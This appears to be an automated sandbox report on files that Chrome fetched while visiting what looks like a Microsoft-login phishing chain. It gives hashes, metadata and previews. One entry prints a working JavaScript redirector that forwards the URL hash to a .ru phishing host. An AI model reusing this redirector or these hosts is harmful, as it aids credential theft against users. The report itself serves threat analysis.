                                                                                                Preview:.PNG........IHDR...1..........]......IDAT.....$.....IEND.B`.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                                                Category:dropped
                                                                                                Size (bytes):122515
                                                                                                Entropy (8bit):7.997419459076181
                                                                                                Encrypted:true
                                                                                                SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                                                MD5:AC9A6ED508328361A4C9530325A94076
                                                                                                SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                                                SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                                                SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                                                Malicious:false
                                                                                                Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:very short file (no magic)
                                                                                                Category:dropped
                                                                                                Size (bytes):1
                                                                                                Entropy (8bit):0.0
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:U:U
                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                Malicious:false
                                                                                                Preview:1
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (65447)
                                                                                                Category:downloaded
                                                                                                Size (bytes):89501
                                                                                                Entropy (8bit):5.289893677458563
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                Malicious:false
                                                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                Category:downloaded
                                                                                                Size (bytes):49911
                                                                                                Entropy (8bit):7.994516776763163
                                                                                                Encrypted:true
                                                                                                SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                                                Category:downloaded
                                                                                                Size (bytes):5525
                                                                                                Entropy (8bit):7.961202222662501
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                                                MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                                                SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                                                SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                                                SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                                                Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with no line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):96
                                                                                                Entropy (8bit):5.220277803943091
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:iuh72iczBra82yFsJFouMo+q6mgqWLsnk:NciczBdTFsJFoM+q6Mk
                                                                                                MD5:46520767C8D53BEFDB7688E66411794F
                                                                                                SHA1:964DB4925CE2A3D3C74329F9E7DE422EAB1CB4C0
                                                                                                SHA-256:2A3BB51F716E053996B41395A6E2F4F49419754C324C02C6693BAFD449867E3D
                                                                                                SHA-512:59ED863313B71B668AC6A6516162A07AC01F1E882747171F555592DE64B2D0DEB8A9CFA29BF014A1D23147D760EA573295A9C4E829BA6AF3708CC3BE3B78CF19
                                                                                                Malicious:false
                                                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                                                Preview:CkYKDQ3RW1FSGgQIVhgCIAEKNQ1Xevf9GgQISxgCKigIClIkChpAISMuKiQtXyslJj8vPV4pKCw6O34nPCJcXRABGP////8P
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                                                Category:dropped
                                                                                                Size (bytes):621
                                                                                                Entropy (8bit):7.673946009263606
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                                                MD5:4761405717E938D7E7400BB15715DB1E
                                                                                                SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                                                SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                                                SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                                                Malicious:false
                                                                                                Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                Category:dropped
                                                                                                Size (bytes):3620
                                                                                                Entropy (8bit):6.867828878374734
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                                                MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                                                SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                                                SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                                                SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                                                Malicious:false
                                                                                                Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                Category:dropped
                                                                                                Size (bytes):35170
                                                                                                Entropy (8bit):7.993096534744333
                                                                                                Encrypted:true
                                                                                                SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                Malicious:false
                                                                                                Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                                                Category:downloaded
                                                                                                Size (bytes):17174
                                                                                                Entropy (8bit):2.9129715116732746
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                                                Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (47520)
                                                                                                Category:dropped
                                                                                                Size (bytes):47521
                                                                                                Entropy (8bit):5.398500199255723
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:11CQfmIG2Y8rH8zH5ei80aszzQhpd+dr6F/PG2Xv9PL79noBL5o6YBU91KL5Gc05:1a/0H8zH5eJdVplGYv9f96Yjy
                                                                                                MD5:301F68F3D8317AB22D4021E266C9A853
                                                                                                SHA1:B464B8B48880C53E9D203A2ACEAF3FDFEC517D97
                                                                                                SHA-256:BF2059BE7007CD21FDD3B5DF727B89C8916142F7ABADFD46408DE17778699FB7
                                                                                                SHA-512:1B2C5CABA6A54F6884E8DC40CB31FFDAA56DD3833DE8F97F0843811617207D1DF0ECEF75E9B88F652D42731E6784F6F51A7021FBB1515738DC5DE8E4B90A5682
                                                                                                Malicious:false
                                                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                                                Category:dropped
                                                                                                Size (bytes):16345
                                                                                                Entropy (8bit):7.98960525258912
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                                                MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                                                SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                                                SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                                                SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                                                Malicious:false
                                                                                                Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                Category:downloaded
                                                                                                Size (bytes):673
                                                                                                Entropy (8bit):7.6596900876595075
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                MD5:0E176276362B94279A4492511BFCBD98
                                                                                                SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                Malicious:false
                                                                                                URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                                                Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:GIF image data, version 89a, 352 x 3
                                                                                                Category:dropped
                                                                                                Size (bytes):2672
                                                                                                Entropy (8bit):6.640973516071413
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                Malicious:false
                                                                                                Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):424
                                                                                                Entropy (8bit):5.3027135576877376
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:LfVEpJVqZ/G8VLLH7Z/G8VLL8LKGpLNgBokxWb:LqSZXRZsLRpheoTb
                                                                                                MD5:6826E1AC08D320A823DBB659074A6C85
                                                                                                SHA1:FA8FA9198F7FF1C9FE46E25A85DA2E1D092D2876
                                                                                                SHA-256:A8C9A36C4D92B679C7F13BB830A35D32652463E54D8C4BAB919A561A20ECBEAA
                                                                                                SHA-512:ACD13A8DDD59BB5C87CD0D3D80043DACD6659DBD70F399FF1DC912C133F9A56A1726C27CBC977886D0C51DF8C535C8622CD2FF443AC1E57C638D11FE7886C206
                                                                                                Malicious:false
                                                                                                URL:https://warrior-empire.com/res444.php?4-68747470733a2f2f5050782e6d757369637374726576626e672e72752f417834454d2f2346-
                                                                                                Preview: <script>.. kSNIReIQRGaZypoQ = location.hash.substring(0);.. let url = null;.. if (!kSNIReIQRGaZypoQ.includes('#')) {.. url = "https://PPx.musicstrevbng.ru/Ax4EM/#F";.. }.. if (kSNIReIQRGaZypoQ.includes('#')) {.. url = "https://PPx.musicstrevbng.ru/Ax4EM/#F" + "#" + String.fromCharCode(Math.floor(Math.random() * (90 - 65 + 1)) + 65);.. }.. location.href = url+kSNIReIQRGaZypoQ;.. </script>
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 28 x 71, 8-bit/color RGB, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):61
                                                                                                Entropy (8bit):4.035372245524404
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:yionv//thPlh4t/OWpsyxl/k4E08up:6v/lhPUtPH7Tp
                                                                                                MD5:C0509578D5FAD5690895E4B731B0469F
                                                                                                SHA1:8E377BD99B31D937324A635580BEFF6AAEA09D00
                                                                                                SHA-256:4FBAA1F95CCF09462C90D02557FCD7EA5A80301518F7C4981021A708D039917B
                                                                                                SHA-512:34201AED2EF8E3306F8C8C001D217FF6D8EE803047FE1A87234ACC60BB2DB55FAC04EFF630CC4E97C0A05B18E62C921FC7D651495DC3E0CB408298218D98D0CA
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR.......G......&......IDAT.....$.....IEND.B`.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):48316
                                                                                                Entropy (8bit):5.6346993394709
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                MD5:2CA03AD87885AB983541092B87ADB299
